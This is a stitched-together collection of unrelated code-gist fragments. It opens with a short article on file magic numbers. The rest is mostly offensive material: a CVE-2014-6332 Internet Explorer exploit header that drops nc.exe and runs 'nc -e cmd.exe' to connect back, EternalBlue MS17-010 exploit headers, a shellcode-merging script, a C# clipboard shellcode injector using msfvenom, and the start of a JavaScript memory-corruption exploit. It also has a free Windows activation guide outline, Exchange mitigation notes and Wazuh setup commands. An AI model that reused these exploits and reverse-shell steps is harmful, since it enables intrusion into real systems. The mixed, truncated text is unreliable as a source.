hxlxmj

File Magic Numbers

Magic numbers are the first bits of a file which uniquely identify the type of file. This makes programming easier because complicated file structures need not be searched in order to identify the file type.

For example, a jpeg file starts with ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ......JFIF.....G ffd8 shows that it's a JPEG file, and ffe0 identify a JFIF type structure. There is an ascii encoding of "JFIF" which comes after a length code, but that is not necessary in order to identify the file. The first 4 bytes do that uniquely.

This gives an ongoing list of file-type magic numbers.

Image Files

hxlxmj

<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target

Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)

hxlxmj

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

hxlxmj

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

hxlxmj

# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack

if len(sys.argv) < 4:
	print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
	sys.exit()

sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()

hxlxmj

// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs

using System;
using System.IO;
using System.Runtime.InteropServices;

namespace ClippySCInject

hxlxmj

<# block non-Exchange admins from PowerShell access in Exchange

ProxyNotShell
CVE-2022-41040
CVE-2022-41082f

some bypasses have been found for the IIS block rules.
need to hard block PowerShell for those that don't **need** it.
Exchange allows PowerShell by default, block by exception. Not ideal, but workable.

hxlxmj

An guide how to activate Windows 10 AND 11 Pro for free

Table of Contents

• Why?
• Am i also able to switch from any other edition to Pro?
• Note for users with unactivated Pro edition
• I get a notification: Your Windows license will expire soon or something that way. What do i do?
• Getting started
• Method 1 For Activating Windows Pro
• Method 2 For Activating Windows Pro
• Method 3 For Activating Windows Pro Permanently

hxlxmj

# Requirements
sudo apt install curl apt-transport-https unzip wget libcap2-bin software-properties-common lsb-release -y
sudo apt install gpgv gpgsm gnupg-l10n gnupg dirmngr -y
add-apt-repository ppa:openjdk-r/ppa
sudo apt update -y
sudo curl -so /etc/profile.d/myenvvars.sh https://gist.githubusercontent.com/austinsonger/2385ff1ef5ccb014aaed4d8684dd6e54/raw/e1d9b85b3383d1a50a54eac68ab7ad7c3e0c2797/myenvvars.sh
export JAVA_HOME=/usr/
sudo apt install openjdk-11-jdk -y

# Wazuh Prep

hxlxmj

function sleep( sleepDuration ){
    var now = new Date().getTime();
    while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } 
}
function gc() {
    for (let i = 0; i < 0x10; i++) {
            new ArrayBuffer(0x1000000);
        }
}
let data_view = new DataView(new ArrayBuffer(8));